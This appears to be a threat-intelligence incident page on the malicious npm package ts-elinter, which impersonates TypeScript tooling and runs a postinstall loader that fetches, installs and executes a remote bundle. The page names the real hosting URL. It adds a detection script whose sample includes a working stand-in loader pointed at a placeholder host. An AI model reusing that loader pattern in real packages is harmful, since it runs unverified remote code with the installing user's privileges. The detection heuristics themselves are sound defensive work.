Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in ts-elinter (npm)


Risk score

92

AI summary

Indexed incident for ts-elinter (npm).

Description

On npm install, the package's postinstall script (scripts/install-check.cjs) fetches a JSON pointer from https://trabalhos-flax.vercel.app/config/clob-math.json, downloads the .tgz it references to a temp directory, extracts it, runs npm install inside the extracted bundle, then require()s peer-math.js and invokes syncSession(). The remote source is a mutable third-party Vercel host with no version pinning, no hash verification and no signature check, so whatever content the endpoint serves at install time executes as Node on the installer's machine, with the installing user's privileges.

The package name ts-elinter and its description 'Teypscrip linkter for termnical' impersonate TypeScript/ESLint tooling, while the actual exported API is unrelated Polymarket Kelly-stake helpers. Cover-story naming (peer-math.js, syncSession, PSM_PEER_URL, log tag [polymarket-stake-math]) frames the loader as a benign peer-dependency sync.
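As an added example (not code from ThreatPkg or from the ts-elinter package), the following Node.js script applies static heuristics for the install-time loader pattern described above: a lifecycle hook whose script reaches a non-registry URL, pulls an archive, runs a nested npm install, require()s a runtime-built path, and shows no sign of checking what it downloaded. It also gives a cheap typosquat hint by edit distance against tooling names. The manifest, the stand-in install script and the placeholder URL https://example.invalid/... are constructed for this example and are not the real files or endpoint; the rule weights, the verdict threshold and the lookalike target list are assumptions.

```javascript
// Added example: static heuristics for the install-time loader pattern.
// Inputs below are constructed; the real package files are not reproduced here.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Each rule marks one piece of the pattern; several hits together are the signal.
// Weights are an assumption chosen for this example.
const RULES = [
  { id: 'remote-url', weight: 3, re: /https?:\/\/(?!registry\.npmjs\.org\/)[^\s'"`)]+/ },
  { id: 'archive-download', weight: 2, re: /\.t(ar\.)?gz\b/ },
  { id: 'nested-npm-install', weight: 3,
    re: /\b(exec|execSync|spawn|spawnSync|execFile|execFileSync)\s*\(\s*['"`]npm\b[^'"`]*\b(i|install|ci)\b/ },
  // require() whose argument is not a plain string literal: a path built at runtime.
  { id: 'dynamic-require', weight: 2, re: /require\s*\(\s*(?!['"`][^'"`]*['"`]\s*\))/ },
  { id: 'temp-dir', weight: 1, re: /\b(os\.tmpdir|mkdtemp|\/tmp\/)/ },
];
// Any sign that downloaded bytes are checked before use. A remote fetch with
// none of these is the "no hash, no signature" condition from the description.
const INTEGRITY_RE = /\b(sha(256|384|512)|integrity|createHash|subtle\.digest|verify)\b/;

function listInstallHooks(pkg) {
  const scripts = pkg.scripts || {};
  return LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === 'string')
    .map((h) => ({ hook: h, command: scripts[h] }));
}

function scanInstallScript(source) {
  const hits = RULES.filter((r) => r.re.test(source)).map((r) => r.id);
  let score = RULES.filter((r) => hits.includes(r.id)).reduce((s, r) => s + r.weight, 0);
  if (hits.includes('remote-url') && !INTEGRITY_RE.test(source)) {
    hits.push('no-integrity-check');
    score += 2;
  }
  return { hits, score };
}

// Plain Levenshtein distance (single-row DP), used as a cheap typosquat hint.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = row[j];
      row[j] = Math.min(row[j] + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = tmp;
    }
  }
  return row[b.length];
}

// Tooling names the package name imitates; the list is an assumption for the example.
const LOOKALIKE_TARGETS = ['eslint', 'tslint', 'ts-lint', 'typescript', 'ts-node'];

function lookalikeHints(name, maxDist = 3) {
  return LOOKALIKE_TARGETS
    .map((t) => ({ target: t, distance: levenshtein(name, t) }))
    .filter((x) => x.distance > 0 && x.distance <= maxDist);
}

// scriptSources maps a hook name to the source of the file its command runs;
// when absent, the command line itself is scanned.
function assessPackage(pkg, scriptSources = {}) {
  const hooks = listInstallHooks(pkg);
  const findings = hooks.map((h) => ({ ...h, ...scanInstallScript(scriptSources[h.hook] || h.command) }));
  const score = findings.reduce((s, f) => s + f.score, 0);
  const verdict = score >= 6 ? 'block' : hooks.length ? 'review' : 'ok';
  return { verdict, score, findings, lookalikes: lookalikeHints(pkg.name) };
}

// Constructed manifest modelled on the description.
const SAMPLE_PKG = {
  name: 'ts-elinter', version: '3.3.9', description: 'Teypscrip linkter for termnical',
  scripts: { postinstall: 'node scripts/install-check.cjs' },
};
// Constructed stand-in for scripts/install-check.cjs following the steps the
// description lists; placeholder URL, not the real endpoint or file.
const SAMPLE_INSTALL_CHECK = `
const fs = require('fs'), os = require('os'), path = require('path');
const { execSync } = require('child_process');
const PSM_PEER_URL = process.env.PSM_PEER_URL || 'https://example.invalid/config/pointer.json';
async function syncPeer() {
  const ptr = await (await fetch(PSM_PEER_URL)).json();
  const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'psm-'));
  const tgz = path.join(dir, 'bundle.tgz');
  fs.writeFileSync(tgz, Buffer.from(await (await fetch(ptr.url)).arrayBuffer()));
  execSync('tar -xzf bundle.tgz', { cwd: dir });
  execSync('npm install', { cwd: path.join(dir, 'package') });
  require(path.join(dir, 'package', 'peer-math.js')).syncSession();
}
syncPeer();
`;
const BENIGN_PKG = { name: 'my-internal-lib', version: '1.0.0' }; // no lifecycle scripts

function demo() {
  const result = assessPackage(SAMPLE_PKG, { postinstall: SAMPLE_INSTALL_CHECK });
  console.log(JSON.stringify(result, null, 2));
  return result;
}
if (typeof require !== 'undefined' && require.main === module) demo();
```

The scan is a triage aid, not proof: a minified or string-obfuscated loader defeats these regexes, and a benign native build script can legitimately hit the temp-dir rule. The controls that do not depend on pattern matching are to install with `npm install --ignore-scripts` (or `npm config set ignore-scripts true` for CI), and to inspect the tarball a registry serves with `npm pack <name>@<version>` before it is ever installed, so the lifecycle hook never runs with the developer's privileges.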

Technical details

Affected versions

=3.3.9 (exactly version 3.3.9)

Indicators

  • affected version = 3.3.9 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents